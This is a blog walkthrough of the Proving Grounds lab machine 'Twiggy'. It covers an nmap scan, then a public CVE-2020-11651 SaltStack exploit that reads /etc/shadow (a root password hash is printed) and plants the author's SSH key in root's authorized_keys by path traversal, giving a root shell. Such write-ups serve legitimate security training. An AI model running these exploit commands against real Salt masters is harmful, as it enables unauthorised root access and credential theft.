Post

Twiggy

Proving Ground Practice Easy Level Machine !

Posted
Linux Easy Level Machine...
Linux Easy Level Machine...
By Shivendra Prajapati
4 min read

Port Scan Results ⤵️

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/Twiggy]
└─$ sudo nmap -sC -sV -T4 -vv -p- -oN Nmap_Results.txt 192.168.228.62
Nmap scan report for 192.168.228.62
Host is up, received echo-reply ttl 61 (0.093s latency).
Scanned at 2024-06-10 12:32:02 IST for 185s
Not shown: 65529 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 61 OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 44:7d:1a:56:9b:68:ae:f5:3b:f6:38:17:73:16:5d:75 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZz8rKSxgnT5mqHeBPqGlXFj2JJdq21roV/2M8/+0F5/5D1XsaXmbktDpKILFdBcYnLtPxWstxPq+FTbWAJad2uk3BPYWRxidK2dOozE5rKLCyxtkEqs/lO09pM6VKQUi83y5wMwI+9Akkir0AMruuFUSpeCIBt/L98g8OYxzyTsylQATnPxJrrQOWGUQYAvX6jIs25n6d3rmbXk/crg1ZfAVFEHEeR9Y6Bjc2o5YWjMp3XbOZyC4yYseoM6eH2yCSDwu1DzPYrU6cNMfxBf863w1uyhiFk3eIb5jud3kfoxIq6t5JU2DXNhEd4rdXuuinZUSxWiCpHLZ1FCi4tkX5
|   256 1c:78:9d:83:81:52:f4:b0:1d:8e:32:03:cb:a6:18:93 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA1gj1q7mOswnou9RvKwuX8S7WFBhz2NlaSIpYPQmM0I/vqb4T459PgJcMaJOE+WmPiMnDSFsyV3C6YszM754Hc=
|   256 08:c9:12:d9:7b:98:98:c8:b3:99:7a:19:82:2e:a3:ea (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBzTSyInONbcDxdYULbDvI/HyrQm9m9M5b6Z825jnBEF
53/tcp   open  domain  syn-ack ttl 61 NLnet Labs NSD
80/tcp   open  http    syn-ack ttl 61 nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: Home | Mezzanine
|_http-favicon: Unknown favicon MD5: 11FB4799192313DD5474A343D9CC0A17
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
4505/tcp open  zmtp    syn-ack ttl 61 ZeroMQ ZMTP 2.0
4506/tcp open  zmtp    syn-ack ttl 61 ZeroMQ ZMTP 2.0
8000/tcp open  http    syn-ack ttl 61 nginx 1.16.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesnt have a title (application/json).
|_http-server-header: nginx/1.16.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

Web Enumeration ⤵️

I checked port 80 and got this nginx static page but I got curious about port 4505 and 4506 so I did some enumeration in those ports and look what I found 🔻

Exploit Usage ⤵️

Looking at port 4505 , 4506 .It looks suspicious so found this exploit online 🔻

https://github.com/jasperla/CVE-2020-11651-poc/tree/master

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/Twiggy]
└─$ python3 exploit.py --master 192.168.190.62 -r /etc/shadow
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/.local/lib/python3.11/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.190.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: lUqzW0VTcy0NHjDD/Ryg28cRApJ2B37tUUmtmqo4ulfpAfprq1sWcuM2WmONtjORNlPgLeCRTVo=
[+] Attemping to read /etc/shadow from 192.168.190.62
root:$6$WT0RuvyM$WIZ6pBFcP7G4pz/jRYY/LBsdyFGIiP3SLl0p32mysET9sBMeNkDXXq52becLp69Q/Uaiu8H0GxQ31XjA8zImo/:18400:0:99999:7:::
bin:*:17834:0:99999:7:::
daemon:*:17834:0:99999:7:::
adm:*:17834:0:99999:7:::
lp:*:17834:0:99999:7:::
sync:*:17834:0:99999:7:::
shutdown:*:17834:0:99999:7:::
halt:*:17834:0:99999:7:::
mail:*:17834:0:99999:7:::
operator:*:17834:0:99999:7:::
games:*:17834:0:99999:7:::
ftp:*:17834:0:99999:7:::
nobody:*:17834:0:99999:7:::
systemd-network:!!:18400::::::
dbus:!!:18400::::::
polkitd:!!:18400::::::
sshd:!!:18400::::::
postfix:!!:18400::::::
chrony:!!:18400::::::
mezz:!!:18400::::::
nginx:!!:18400::::::
named:!!:18400::::::

I got LFI on this so lets use this exploit to upload our authorized_keys to victim machine to make a connection with ssh without any credentials.

1
2
3
4
5
6
7
8
9
10
11

┌──(kali㉿kali)-[~/Downloads/Proving_Ground/Practice/Twiggy]
└─$ python3 exploit.py --master 192.168.190.62 --upload-src /home/kali/.ssh/id_ed25519.pub --upload-dest ../../../../../../../root/.ssh/authorized_keys
[!] Please only use this script to verify you have correctly patched systems you have permission to access. Hit ^C to abort.
/home/kali/.local/lib/python3.11/site-packages/salt/transport/client.py:28: DeprecationWarning: This module is deprecated. Please use salt.channel.client instead.
  warn_until(
[+] Checking salt-master (192.168.190.62:4506) status... ONLINE
[+] Checking if vulnerable to CVE-2020-11651... YES
[*] root key obtained: lUqzW0VTcy0NHjDD/Ryg28cRApJ2B37tUUmtmqo4ulfpAfprq1sWcuM2WmONtjORNlPgLeCRTVo=
[+] Attemping to upload /home/kali/.ssh/id_ed25519.pub to ../../../../../../../root/.ssh/authorized_keys on 192.168.190.62
[ ] Wrote data to file /srv/salt/../../../../../../../root/.ssh/authorized_keys

I generated my SSH keys though this ssh-keygen command.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

┌──(kali㉿kali)-[~]
└─$ ssh-keygen                    
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/kali/.ssh/id_ed25519): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kali/.ssh/id_ed25519
Your public key has been saved in /home/kali/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:ZsLjB3ZjIcGAxrqAkzXbFjDU+Ed53qNTXJJlnT2AkSk kali@kali
The keys randomart image is:
+--[ED25519 256]--+
| o+=.o..   +Bo.o |
|  B.o +..Eo=. o..|
|.= = o.o.o.o    .|
|* . +.....=      |
|.o . .* So .     |
|.    o Oo.       |
|      . ..       |
|       .         |
|                 |
+----[SHA256]-----+

└─$ cd .ssh/

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
authorized_keys  config  id_ed25519  id_ed25519.pub  known_hosts  known_hosts.old

┌──(kali㉿kali)-[~/.ssh]
└─$ pwd                      
/home/kali/.ssh

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
authorized_keys  config  id_ed25519  id_ed25519.pub  known_hosts  known_hosts.old

┌──(kali㉿kali)-[~/.ssh]
└─$ chmod 600 id_ed25519.pub 

└─$ chmod 600 id_ed25519    

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh -i id_ed25519 root@192.168.190.62
The authenticity of host '192.168.190.62 (192.168.190.62)' cant be established.
ED25519 key fingerprint is SHA256:uYMZFN9vYkxFeoZ23/Znor6lCrABMH4HLFk4qNAIkB4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.190.62' (ED25519) to the list of known hosts.
[root@twiggy ~]# whoami
root
[root@twiggy ~]# pwd
/root
[root@twiggy ~]# ls -al
total 24
dr-xr-x---.  4 root root 153 Jun 10 12:40 .
dr-xr-xr-x. 17 root root 244 May 18  2020 ..
-rw-r--r--.  1 root root   0 Jul 27  2020 .bash_history
-rw-r--r--.  1 root root  18 Dec 28  2013 .bash_logout
-rw-r--r--.  1 root root 176 Dec 28  2013 .bash_profile
-rw-r--r--.  1 root root 176 Dec 28  2013 .bashrc
-rw-r--r--.  1 root root 100 Dec 28  2013 .cshrc
drwxr-----.  3 root root  19 May 18  2020 .pki
-rw-r--r--   1 root root  33 Jun 10 12:19 proof.txt
drwxr-xr-x   2 root root  29 Jun 10 12:40 .ssh
-rw-r--r--.  1 root root 129 Dec 28  2013 .tcshrc
[root@twiggy ~]# cat proof.txt
b63d0adb7cae71da9a407c32f0d7dc21
[root@twiggy ~]#

I got directly the root shell !

If you have any questions or suggestions, please leave a comment below. Thank You !

Proving Grounds, Practice
Public Exploit ZeroMQ_ZMTP_2_0 ssh-keygen
This post is licensed under CC BY 4.0 by the author.